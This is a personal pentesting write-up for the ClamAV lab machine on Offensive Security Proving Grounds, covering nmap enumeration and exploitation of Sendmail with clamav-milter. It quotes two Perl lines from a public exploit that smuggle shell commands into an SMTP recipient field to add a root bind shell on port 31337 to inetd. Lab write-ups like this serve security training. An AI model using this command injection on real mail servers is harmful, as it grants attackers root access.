👨💻
👨💻
👨💻
👨💻
Pentesting
Home
CTFs
Learn
Search…
Zeyu's Pentesting Writeups
Home
CTF Writeups
My Vulnerable Website
Blog Posts
My OSCP Journey: How I Tried Harder
Proving Grounds
Warm Up
Pebbles
Twiggy
Bratarina
Internal
ClamAV
Get to Work
Try Harder
Hack the Box
Easy
Medium
Powered By
GitBook
ClamAV
Writeup for ClamAV from Offensive Security Proving Grounds (PG)
Information Gathering
Service Enumeration
nmapAutomator.sh -H 192.168.66.42 -t full
nmapAutomator.sh -H 192.168.66.42 -t vulns
HTTP (80)
There is a page with a binary message.
Challenge accepted!
SMTP (25)
We can see that Sendmail 8.13.4 is used.
Exploitation
We find the following Sendmail + ClamAV RCE exploit:
Sendmail with clamav-milter < 0.91.2 - Remote Command Execution
Exploit Database
The two lines in the Perl script:
1
print
$sock
"rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n"
;
2
print
$sock
"rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n"
;
Copied!
appear to open port 31337 as a root shell.
After running the script, the port is indeed open.
Upon connecting to the bind shell, use
bash -i
to upgrade to a fully interactive shell.
Previous
Internal
Next - Proving Grounds
Get to Work
Last modified
1yr ago
Copy link
Contents
Information Gathering
Service Enumeration
HTTP (80)
SMTP (25)
Exploitation